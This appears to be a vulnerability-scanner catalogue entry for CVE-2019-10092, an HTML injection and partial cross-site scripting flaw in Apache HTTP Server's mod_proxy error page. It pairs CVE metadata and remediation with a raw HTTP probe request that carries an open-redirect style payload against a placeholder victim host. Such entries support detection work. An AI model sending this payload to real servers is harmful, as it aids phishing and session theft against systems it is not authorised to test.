| Title | Apache HTTP Server <=2.4.39 - HTML Injection/Partial Cross-Site Scripting |
|---|---|
| Author | pdteam |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious HTML code or execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to Apache HTTP Server version 2.4.40 or later, which includes a fix for this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.82379 |
| CVE ID | CVE-2019-10092 |
| CWE ID | CWE-79 |
| Shodan Query | cpe:"cpe:2.3:a:apache:http_server"apache 2.4.49 |
| Tags | cve cve2019 apache htmli injection vuln |
Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.
GET /%5cgoogle.com/evil.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-10092.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-10092.pcap
N/AN/A